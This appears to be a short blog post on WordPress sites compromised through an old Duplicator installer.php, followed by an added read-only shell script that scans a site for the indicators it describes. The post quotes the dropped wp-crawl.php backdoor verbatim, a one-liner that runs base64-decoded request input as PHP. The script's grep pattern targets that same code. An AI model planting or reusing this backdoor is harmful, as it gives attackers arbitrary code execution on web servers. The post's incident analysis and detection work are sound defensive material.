wp-config.php goes missing
By Preneesh AV, 07-Sep-2018
In some cases a WordPress installation is attacked by exploiting the installer.php file of the Duplicator plugin. The website then suddenly displays the WordPress installation process because the wp-config.php file is missing.
On all infected installations, a file called wp-crawl.php is found in the WP root and in the upload folder. It contains the following code:
@file_put_contents('tempcrawl','<?php '.base64_decode($_REQUEST['q'])); @include('tempcrawl'); @unlink('tempcrawl');
All the infected installations have Duplicator installed, and the installer.php file is often very old.
Duplicator doesn’t have to be installed. If the installer.php file from a previous version of Duplicator was never removed, that file can be exploited.
Quick fix / solution:
i) Remove both wp-crawl.php files.
ii) Copy the wp-config.php file from another project.
iii) Change the database name and password in wp-config.php.
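
A read-only triage script for the indicators described in this post: a missing wp-config.php, wp-crawl.php in the WP root and upload folder, a leftover installer.php, and PHP files containing the base64_decode($_REQUEST one-liner. This is an added example, not part of the original post; the function names, output labels and the sample tree are constructed for illustration.

```shell
#!/bin/sh
# Added example: triage one WordPress root for the indicators named in this post.
# Read-only: it lists findings and deletes nothing.
scan_wp_root() {
    root=$1
    [ -d "$root" ] || { echo "not a directory: $root" >&2; return 2; }

    # Symptom: the site shows the installer because wp-config.php is gone.
    [ -f "$root/wp-config.php" ] || echo "MISSING $root/wp-config.php"

    # Dropped backdoor (WP root and upload folder) and its temporary file.
    find "$root" -type f \( -name 'wp-crawl.php' -o -name 'tempcrawl' \) |
        sed 's/^/DROPPED /'

    # Leftover Duplicator installer, the entry point described above.
    find "$root" -type f -name 'installer.php' | sed 's/^/INSTALLER /'

    # Renamed copies: any PHP file that passes a request parameter to
    # base64_decode, as the wp-crawl.php one-liner does. Heuristic; review hits.
    find "$root" -type f -name '*.php' \
        -exec grep -lF 'base64_decode($_REQUEST' {} + | sed 's/^/SUSPECT /'
    return 0
}

# Constructed sample tree (inert placeholder files) so the scan can be tried offline.
make_sample_tree() {
    t=$(mktemp -d) || return 1
    mkdir -p "$t/wp-content/uploads"
    echo '<?php // placeholder' > "$t/index.php"
    echo '<?php // placeholder' > "$t/installer.php"
    for f in "$t/wp-crawl.php" "$t/wp-content/uploads/wp-crawl.php"; do
        echo '<?php // constructed marker: base64_decode($_REQUEST' > "$f"
    done
    echo "$t"
}

# Usage: sh scan.sh /var/www/site   (no argument: scan the constructed sample)
if [ "$#" -gt 0 ]; then
    scan_wp_root "$1"
else
    sample=$(make_sample_tree) && scan_wp_root "$sample" && rm -rf "$sample"
fi
```

An INSTALLER or SUSPECT line on a site that still has its wp-config.php means the same entry point or backdoor is present there even though the visible symptom has not appeared.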
